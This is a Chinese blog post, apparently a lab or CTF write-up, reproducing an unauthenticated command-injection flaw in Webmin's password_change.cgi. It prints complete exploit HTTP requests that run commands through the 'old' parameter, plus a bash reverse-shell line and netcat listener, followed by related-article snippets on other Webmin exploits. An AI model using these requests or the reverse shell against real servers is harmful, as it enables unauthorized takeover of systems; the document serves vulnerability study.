Webmin未经身份验证的远程代码执行

最新推荐文章于 2023-03-22 22:02:00 发布
最新推荐文章于 2023-03-22 22:02:00 发布
阅读量214 收藏
点赞数
分类专栏: 文件包含 文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/126982060
版权

漏洞介绍:

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

在这里插入图片描述
漏洞复现:

参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况下(而参考链接中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。

发送如下数据包,即可执行命令ls:

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=hdrtasrg&pam=1&expired=2&old=ls&new1=1111&new2=1111

在这里插入图片描述

修改下poc

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=hdrtasrg&pam=1&expired=2&old=cat/
key.txt&new1=1111&new2=1111

获得key

延展

简单利用getshell:

将命令 bash -c “bash -i >& /dev/tcp/内网监听ip/9999 0>&1” 进行url编码 用nc -vvlp 9999 监听任意端口等待返回shell

在这里插入图片描述

成功返回shell

在这里插入图片描述

Yolo山药
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webmin远程命令执行漏洞
m0_56578216的博客
10-12 279
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。,只有在发送的用户参数的值不是已知的Linux用户的情况下,才会到修改/etc/shadow的地方获得命令执行的权限,触发命令注入漏洞。该webmin漏洞的漏洞点在password_change.cgi配置文件中,如果使用不存在的用户重置密码,就会定位到。如图,里面有一个镜像文件的信息和服务名,以及它的。远程命令执行漏洞(RCE)修改数据包的两处位置,
CVE-2022-36446 Webmin命令注入漏洞
weixin_45705830的博客
03-02 446
CVE-2022-36446是一个Webmin的任意命令注入漏洞,影响了1.997版本之前的Webmin。该漏洞存在于software/apt-lib.pl文件中,由于缺乏对用户输入的HTML转义,导致可以注入将连接到包管理器调用的任意命令。该漏洞可以被远程未经身份验证的攻击者利用,执行任意代码或获取系统权限。
Webmin未经身份验证远程代码执行(CVE-2019-15107)
菜鸟耿耿
10-09 675
Webmin未经身份验证远程代码执行(漏洞复现) 漏洞版本 CVE-2019-15107 漏洞描述 Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。 影响版本:Webmin<=1.920 环境搭建 靶机IP: 192.168.35.143 攻击者IP:192.168.35.128 启动靶机环境 docker-compose build docker-compose up -d 去访问页面
墨者学院-Webmin未经身份验证远程代码执行
qq_47094508的博客
07-01 610
首先拿到靶场后进行访问,访问后来到一个登陆页面根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行 直接查询根下的key.txt即可......
【墨者学院】Webmin未经身份验证远程代码执行
yoyoko_chan的博客
07-29 500
0x00 0x01  进入靶场,发现是个登录界面  搜索查找了这个漏洞的详情后,知道了该漏洞编号为CVE-2019-15107,根据漏洞介绍,知道了该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。  所以将其用BurpSuite抓包到重放模块。修改访问地址、Referer以及POST内容  查看可知根目录下存在key.txt,修改poc读出key即可 0x03  学到了新的cve,了解了一个新的poc。 ...
墨者学院—Webmin未经身份验证远程代码执行(简单复习)
LRedAnt的博客
12-25 1454
墨者学院—Webmin未经身份验证远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-1...
Webmin未经身份验证远程代码执行-墨者学院
小白鸽
07-31 517
漏洞描述 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-15107) 1.漏洞编号: cve-2019-15107 2.漏洞描述: 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.c
Linux远程管理与监控
Linux系统中,远程管理与监控尤为重要,因为大部分服务器都会运行在Linux系统上,远程管理可以帮助管理员快速响应和处理各种故障和安全事件,同时监控系统的性能和资源利用情况,及时调整系统配置,提高系统的稳定...
墨者Webmin未经身份验证远程代码执行题解
zr1213159840的博客
01-11 430
先随便输入账号密码,然后抓包 将上图的post部分修改为 password_change.cgi 将提交的数据部分修改为 user=hhhh&pam=1&expired=2&old=cat /key.txt&new1=1111&new2=1111 一直forward拿到key
墨者靶场(初级) Webmin未经身份验证远程代码执行
曹振国的博客
06-24 333
命令执行的漏洞在old参数后 1. 漏洞原理 https://www.anquanke.com/post/id/184668 2. 漏洞复现 https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md 3. 漏洞利用 (1)修改提交地址 POST /session_login.cgi HTTP/1.1 ===> POST /password_change.cgi HTTP/1.
墨者Webmin未经身份验证远程代码执行(CVE-2019-15107)wp
m0_58543272的博客
08-10 564
墨者Webmin未经身份验证远程代码执行wp
Webmin未经身份验证远程代码执行 CVE-2019-15107 漏洞复现
ADummy的博客
03-02 284
Webmin未经身份验证远程代码执行(CVE-2019-15107) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能
CVE-2022-0824 Webmin 远程代码执行
最新发布
weixin_45501486的博客
03-22 192
0x00 简介Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地集合对象一样轻松地操作分布式数据集。spark除了能够提供交互式查询外,它还可以优化迭代工作负载。0x01 漏洞概述该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable...
Webmin 远程代码执行 (CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3304
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
CVE-2022-0824 Webmin 远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-11 2715
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
CVE-2019-15107 Webmin远程命令执行漏洞复现
EC_Carrot的博客
03-03 284
漏洞概括 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 影响版本: Webmin <= 1.920 环境搭建 自己用docker搭了个1.910版本的Webmin,具体操作… 漏洞的触发需要开启密码重置功能,需要把允许用户使用旧密码设置新密码的选项给选上。 登录
SSH与Webmin实战:Linux远程管理教程
本次Linux实验主要关注的是远程管理技术,包括两个关键部分:SSH远程管理和Webmin工具的运用。实验旨在提升学员对Linux系统的管理能力,确保他们能够熟练地通过SSH协议进行安全的远程登录和配置,以及利用Webmin这款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值